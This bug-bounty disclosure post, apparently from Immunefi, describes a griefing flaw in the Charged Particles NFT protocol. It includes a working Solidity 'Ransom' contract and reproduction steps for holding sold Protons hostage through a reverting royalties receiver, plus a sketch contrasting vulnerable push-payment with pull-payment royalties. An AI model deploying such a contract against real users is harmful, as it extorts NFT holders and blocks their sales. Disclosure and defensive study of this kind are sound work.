Charged Particles Griefing Bugfix Review

Immunefi
Published in Immunefi · 2 min read · May 21, 2021

Summary

Whitehat Alejandro Muñoz-McDonald submitted a vulnerability classified as “High” in Charged Particles on February 9. The vulnerability was a griefing/denial of service attack against the protocol that would have allowed a malicious user to create a system where bribes had to be paid for a user to buy or sell an NFT. Charged Particles paid Alejandro Muñoz-McDonald a $5,000 USDC bounty.

Vulnerability Analysis

Charged Particles is a decentralized NFT marketplace where users can deposit ERC-20 tokens into any NFT. Under the Charged Particles protocol, a “Proton” refers to the ERC721 contract for a particle, which is an NFT ready to be energized by adding interest-bearing assets to it. Prior to the fix of this vulnerability, a malicious proton creator could have held Protons hostage after selling them by creating a malicious ransom contract and setting it to be the royalties receiver. The bug was found in Proton.sol.

This vulnerability can be illustrated with a step-by-step analysis.

1. Call createProtonForSale with valid parameters and a royaltiesPercent > 0. Move to the next step once the token is sold.

2. Create a malicious ransom contract

pragma solidity 0.6.12;

contract Ransom {
    // Stays true until the ransom is paid; while true, every incoming
    // royalty payment reverts, which blocks any sale of the Proton.
    bool internal ransomEnabled = true;

    constructor() public {}

    // The attacker lifts the lock once at least 1 ether has been paid in.
    function unlockNFT() public payable {
        if (msg.value >= 1 ether) {
            ransomEnabled = false;
        }
    }

    // Receives the royalty transfer; reverts as long as the ransom is unpaid.
    fallback() external payable {
        require(!ransomEnabled);
    }
}

3. Call setCreatorRoyaltiesReceiver(…) with the energizedParticleId and the address of the malicious contract.

4. With setCreatorRoyaltiesReceiver called, the Proton is locked and cannot be sold, because the ransom contract's payable fallback function reverts on every royalty payment as long as the ransom has not been paid.
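The mechanism behind the lock, as an added sketch that is not Charged Particles' code: a sale flow that pushes the royalty to the creator-chosen receiver inside the purchase transaction, next to a pull-payment variant in which the receiver withdraws its royalties later. The pull-payment form is one standard mitigation for this class of bug and is an assumption here, not a description of the project's actual fix; the contract name, the `list` helper and the token-transfer step are placeholders.

```solidity
pragma solidity 0.6.12;

// Added illustration (not the project's code): push-payment royalties that a
// reverting receiver can hold hostage, beside a pull-payment version.
contract RoyaltySaleSketch {
    mapping(uint256 => address payable) public royaltiesReceiver; // set by creator
    mapping(uint256 => uint256) public royaltiesBps;               // basis points
    mapping(uint256 => address payable) public seller;
    mapping(uint256 => uint256) public price;
    mapping(address => uint256) public pendingRoyalties;           // pull balances

    // Listing helper so the sketch can be exercised; royalties capped at 100%.
    function list(uint256 tokenId, uint256 p, address payable r, uint256 bps) external {
        require(bps <= 10000, "bps > 100%");
        price[tokenId] = p; seller[tokenId] = msg.sender;
        royaltiesReceiver[tokenId] = r; royaltiesBps[tokenId] = bps;
    }

    // Vulnerable pattern: the royalty is pushed to the receiver during the sale.
    // If the receiver's fallback reverts (as Ransom does), the whole purchase
    // reverts and the token can never change hands.
    function buyVulnerable(uint256 tokenId) external payable {
        require(msg.value == price[tokenId], "wrong price");
        uint256 royalty = msg.value * royaltiesBps[tokenId] / 10000;
        (bool ok, ) = royaltiesReceiver[tokenId].call{value: royalty}("");
        require(ok, "royalty transfer failed"); // receiver-controlled revert
        seller[tokenId].transfer(msg.value - royalty);
        // ... transfer the token to msg.sender (omitted) ...
    }

    // Hardened pattern: credit the royalty to a balance the receiver withdraws
    // later, so the sale never depends on the receiver accepting ether.
    function buyHardened(uint256 tokenId) external payable {
        require(msg.value == price[tokenId], "wrong price");
        uint256 royalty = msg.value * royaltiesBps[tokenId] / 10000;
        pendingRoyalties[royaltiesReceiver[tokenId]] += royalty;
        seller[tokenId].transfer(msg.value - royalty);
        // ... transfer the token to msg.sender (omitted) ...
    }

    // The receiver pulls its own royalties; a reverting receiver only hurts itself.
    function withdrawRoyalties() external {
        uint256 amount = pendingRoyalties[msg.sender];
        require(amount > 0, "nothing to withdraw");
        pendingRoyalties[msg.sender] = 0; // zero before the external call
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "withdraw failed");
    }
}
```

The same review applies to any address a third party can set as a payment destination: if the protocol's critical path requires that address to accept ether, whoever controls it can stall the path.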

Vulnerability Fix

Charged Particles quickly implemented a fix for the bug, which is available here:

https://github.com/Charged-Particles/charged-particles-universe/commit/f4fb60e3f791c1bb3b8907276b27d0319ce46a68#diff-91fca72e3021a185238dd0e82e118ae3ab5993db93dd322d301c665ff74e3eed

Acknowledgements

We’d like to thank Charged Particles for quickly acknowledging the bug and implementing a fix. Charged Particles has paid out a bounty of $5,000 to whitehat Alejandro Muñoz-McDonald. To report additional vulnerabilities, please see Charged Particles’ bug bounty program with Immunefi.

If you’d like to start bug hunting, we got you. Check out the Web3 Security Library, and start earning rewards on Immunefi — the leading bug bounty platform for web3 with the world’s biggest payouts.

If you’re interested in protecting your project with a bug bounty like Charged Particles, visit the Immunefi services page and fill out the form.
